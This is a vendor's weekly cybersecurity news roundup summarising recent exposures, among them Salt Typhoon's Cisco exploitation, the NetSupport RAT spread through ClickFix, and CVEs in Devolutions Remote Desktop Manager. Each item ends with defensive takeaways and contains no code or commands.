Exposures, Exposed! Weekly Round-up February 17 – February 23

Welcome to the post-Presidents' Day special edition of Exposures, Exposed! - XM Cyber’s weekly roundup of the most critical exposure events. Our dedicated team has been keeping a watchful eye on the cyber world, uncovering vulnerabilities that need your attention. Below, you’ll find this week’s most urgent and noteworthy exposures – because nothing shows leadership like securing your environment!

Salt Typhoon Exploits Cisco Vulnerabilities in Attacks

The Chinese state-sponsored APT group Salt Typhoon has been exploiting two vulnerabilities in Cisco devices, targeting telecommunications providers and universities worldwide. Operated by China’s Ministry of State Security, Salt Typhoon has been linked to several attacks, including the 2023 hacking of nine US telecom companies. Despite public disclosure and sanctions, the group has continued its campaign.

The group used vulnerabilities in Cisco’s IOS XE platform, identified as CVE-2023-20198 and CVE-2023-20273, to compromise devices. RedMike, a subgroup of Salt Typhoon, attempted to exploit over 1,000 Cisco devices globally, with more than half of these located in the US, South America, and India. The targeted devices included network infrastructure of telecom providers and universities in various countries.

The Takeaway: Telecom and network administrators must patch vulnerabilities and implement strict security controls. Learn more here.

Intel Resolves 374 Vulnerabilities in 2024 Security Effort

Intel addressed 374 vulnerabilities across software, firmware, and hardware in 2024, with roughly half of the issues receiving bug bounty rewards. The majority of bugs (272) were found in software, including utilities, drivers, applications, and SDKs. Intel resolved 81 vulnerabilities in firmware, with UEFI, NUC BIOS, and networking products being the most affected. The company also patched 21 hardware flaws, including issues with processors and Intel SGX.?

The total number of resolved vulnerabilities increased by 6% from 2023. Intel proactively discovered and mitigated 94% of firmware flaws and 92% of software flaws. Bug bounty rewards were paid for 53% of the vulnerabilities, with the majority (84%) for software flaws. UEFI was the top bug bounty product category. Intel also addressed several platform firmware vulnerabilities and GPU flaws and maintained a quarterly update process for consistent patching.

The Takeaway: Organizations should prioritize updating systems with Intel’s quarterly patches. Learn more here.

Increase in Use of NetSupport RAT Threatens Security

Cybersecurity experts report a rise in the use of the NetSupport Remote Access Trojan (RAT), a tool that allows attackers to gain full control over compromised systems. This activity links to the "ClickFix" Initial Access Vector (IAV), which uses social engineering to trick users into running malicious PowerShell commands. Originally developed in 1989 as a remote IT support tool, NetSupport RAT has been weaponized to monitor screens, control keyboards and mice, upload files, and execute commands. If undetected, it can lead to ransomware attacks, data breaches, and operational disruptions.?

The ClickFix technique involves fake CAPTCHA pages instructing users to run PowerShell commands that download and install the RAT. To defend against these attacks, organizations should deploy Endpoint Detection and Response (EDR) agents, conduct security training, limit user permissions, and restrict certain software execution.

The Takeaway: Organizations should implement EDR, educate employees, and limit user permissions to prevent RAT infections. Learn more here.

Critical Vulnerabilities Found in Devolutions Remote Desktop Manager

Devolutions has disclosed severe vulnerabilities in its Remote Desktop Manager (RDM) software that could enable attackers to intercept and modify encrypted communications through man-in-the-middle (MITM) attacks. The flaws are related to improper certificate validation across all platforms. CVE-2025-1193, with a CVSS score of 8.5, affects Windows versions 2024.3.19 and earlier, where the software fails to properly validate hosts during certificate checks.?

CVE-2024-11621, with a CVSS score of 8.6, affects macOS, Linux, Android, iOS, and PowerShell versions, where certificate validation is entirely absent. This lack of validation allows attackers to present fraudulent certificates, enabling MITM attacks. Affected users should upgrade to the latest patched versions: Windows 2024.3.20, macOS 2024.3.10.3, Linux 2024.3.2.9, Android 2024.3.4.2, iOS 2024.3.4, and PowerShell 2024.3.7.

The Takeaway: Users should immediately upgrade to the latest versions of RDM to protect against MITM attacks. Learn more here.

Cloudflare Patches Critical Broadcast Amplification Vulnerability

Cloudflare recently patched a broadcast amplification vulnerability discovered by anonymous security researchers. The flaw was identified during QUIC Internet measurement research. The vulnerability allowed attackers to exploit the QUIC protocol, triggering a large response from Cloudflare servers. This attack led to both server CPU and reflection amplification. The issue arose from the improper handling of broadcast addresses in Cloudflare's infrastructure.?

Researchers found that a single QUIC Initial packet sent to a broadcast IP address could cause excessive server responses, bypassing QUIC's anti-amplification limits. Cloudflare mitigated the issue by removing broadcast routes for anycast prefixes from its loopback interface. The vulnerability affected UDP-based services and could impact systems with similar configurations. Cloudflare recommends that administrators assess their systems for similar risks.

The Takeaway: Network administrators should remove broadcast routes to mitigate amplification risks. Learn more here.

Manufacturers Urged to Address Buffer Overflow Vulnerabilities

The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI have issued a Secure by Design Alert urging manufacturers to prevent buffer overflow vulnerabilities in their products. The agencies highlighted that buffer overflow vulnerabilities are common software defects that can compromise systems. Despite available mitigation measures, unsafe software practices continue to result in these vulnerabilities.?

CISA recommended that manufacturers use memory-safe languages during software development, conduct aggressive product testing, and publish a memory-safety roadmap. The alert stressed the importance of adopting these practices.?

The agencies also called on customers to demand safe development practices from manufacturers, including requests for a software bill of materials and a secure software development attestation.?

The Takeaway: Manufacturers must adopt memory-safe practices to mitigate buffer overflow vulnerabilities. Learn more here.

That’s all for this week – have any exposures to add to our list? Let us know!

Read our latest blog "From ArgoCD To Azure Hybrid Attacks":